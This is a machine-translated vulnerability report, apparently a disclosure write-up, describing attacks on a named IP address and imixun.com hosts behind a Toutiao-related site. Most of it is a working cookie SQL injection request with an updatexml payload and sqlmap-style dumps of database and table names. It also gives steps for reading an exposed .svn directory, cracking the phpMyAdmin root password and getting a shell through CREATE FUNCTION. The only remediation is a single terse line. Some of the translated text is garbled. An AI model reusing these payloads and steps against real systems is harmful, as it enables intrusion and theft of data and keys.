Toutiao's website cookie injection + Source Code leakage + getshell + WeChat key Leakage

Toutiao's website cookie injection + Source Code leakage + getshell + key Leakage

Toutiao's website cookie injection + Source Code leakage + getshell + key Leakage

Http: // 42.96.190.138/

This site has SQL Injection

There should be more than one

Cookie injection data packets are as follows:
 

GET /index.php?g=WEBAPP&m=Index&a=getCategoryPagePropertyDepartment HTTP/1.1Host: 42.96.190.138Proxy-Connection: keep-aliveUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2376.0 Safari/537.36Accept: */*Referer: http://42.96.190.138:3333/index.php?g=WEBAPP&page=cusform-formlist&dept_id=1%20and%201=if(1=2,1,(select%201%20union%20select%202))Accept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4,ja;q=0.2Cookie: PHPSESSID=sqr24iplkeltnokj5g43q7et52; YP_onlineid=%22796df709c9c89a5d3e0e44e600a3efb8%22; last_update_time=2015-04-30+11%3A47%3A55; dept_id=11119 and 1=(updatexml(1,concat(0x3a,(select user() from mysql.user)),1)); YP_think_language=%22cn%22

 

 

available databases [2]:[*] information_schema[*] ttbdxt

 

[11:59:41] [INFO] retrieved: imi_activity_count_plus_20150426[11:59:41] [INFO] retrieved: imi_activity_count_plus_20150427[11:59:41] [INFO] retrieved: imi_activity_count_plus_20150422[11:59:41] [INFO] retrieved: imi_activity_count_plus_20150424[11:59:41] [INFO] retrieved: imi_activity_count_plus_20150425[11:59:42] [INFO] retrieved: imi_activity_count_url[11:59:42] [INFO] retrieved: imi_activity_log[11:59:42] [INFO] retrieved: imi_activity_prize55122[11:59:42] [INFO] retrieved: imi_activity_count_plus_20150429[11:59:42] [INFO] retrieved: imi_activity_prize_record55122[11:59:42] [INFO] retrieved: imi_activity_record55122[11:59:42] [INFO] retrieved: imi_activity_count_plus_20150428[11:59:42] [INFO] retrieved: imi_app_log[11:59:42] [INFO] retrieved: imi_activity_count_plus_20150430[11:59:42] [INFO] retrieved: imi_block[11:59:42] [INFO] retrieved: imi_cart[11:59:42] [INFO] retrieved: imi_category[11:59:42] [INFO] retrieved: imi_attachment

Update the latest data every day



Imi_config found



| Minimum Image Width | 0 | http://appadmin.imixun.com/| watermark_minwidth |

| 5 | CMS address | 0 | https://download.imixun.com/index.php? M = Download & appcode = ttbdxt & publishtype = online | site_url |

| 5 | watermark minimum height | 0 | https://download.imixun.com/index.php? M = Download & appcode = ttbdxt & publishtype = online | watermark_minheight


 

Downloaded and captured

Ttbdxt.imixun.com/index.php? G = API & m = GetActivityDetail

Ttbdxt.imixun.com

This site has the same injection

And is the direct shell with the root permission.
 

 

Let's look at 42.96.190.138.



Http: // 42.96.190.138/. svn/entries

Code Leakage


 

The appid and secret of weixin are also missing.
 

Although the site injection is not root, phpmyadmin exists.

Http: // 42.96.190.138/phpmyadmin can crack the root password



Simple audit code discovery can also be shell

You can use the create FUNCTION to write data to the shell.
 

 

Solution:

Delete svn repair weak password parameter Filtering